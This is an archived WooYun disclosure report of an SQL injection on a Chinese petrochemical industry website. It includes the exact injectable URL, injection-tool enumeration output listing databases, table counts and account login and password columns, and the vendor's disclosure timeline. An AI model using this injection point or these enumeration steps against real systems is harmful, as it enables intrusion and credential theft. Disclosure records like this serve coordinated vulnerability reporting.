
Vulnerability summary

Defect ID: wooyun-2015-0128515

Title: SQL injection on a China Petroleum and Chemical Network (中国石油和化工网) site

Vendor: China Petroleum and Chemical Network (中国石油和化工网)

Author: 蝶.!

Submitted: 2015-07-22 23:35

Fixed: 2015-09-10 08:22

Published: 2015-09-10 08:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-07-22: Details sent to the vendor; awaiting vendor response
2015-07-27: Vendor confirmed; details disclosed to the vendor only
2015-08-06: Details disclosed to core white hats and domain experts
2015-08-16: Details disclosed to regular white hats
2015-08-26: Details disclosed to intern white hats
2015-09-10: Details disclosed to the public

Brief description:

SQL injection on a China Petroleum and Chemical Network (中国石油和化工网) site.
China Petroleum and Chemical Network (www.chemall.com.cn) was founded in March 2000 and is operated by 北京朗津网络信息技术有限公司 (Beijing Langjin Network Information Technology Co., Ltd.). After more than ten years of development it has over 90,000 registered customers and was once rated among China's top 100 industry websites.

Detailed description:

Injection point: http://chemall.com.cn:80/helpcenter/lawindex.asp?lawtype=%B7%A8%C2%C9
Selected Column Count is 6
Valid String Column is 4
DB Server: MsSQL no error
DB Name: helpenter
Count(name) of [master]..[sysdatabases] is 18

Proof of vulnerability:

Count(name) of [helpenter]..[sysobjects] where xtype=char(85) is 13
Count(name) of [chemallmanager@#2014]..[sysobjects] where xtype=char(85) is 56
Column found: cbcbit
Column found: cbcnumber
Column found: cbcstate
Column found: id
Can not get Count(name) of [chemallmanager@#2014]..[syscolumns] where id=(select id from [chemallmanager@#2014]....sysobjects where name=char(97)%2bchar(99)%2bchar(99)%2bchar(111)%2bchar(117)%2bchar(110)%2bchar(116))
Column found: account_id
Column found: account_isuse
Column found: account_loginname
Column found: account_pwd
Column found: accounttype_id
Column found: employee_id

Remediation:

Copyright notice: when reproducing, credit the source 蝶.!@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-07-27 08:21

Vendor reply:

CNVD confirmed and reproduced the described situation and has notified the site operator by email through its publicly listed contact channel; the operator will provide a solution in due course.

Latest status:

None yet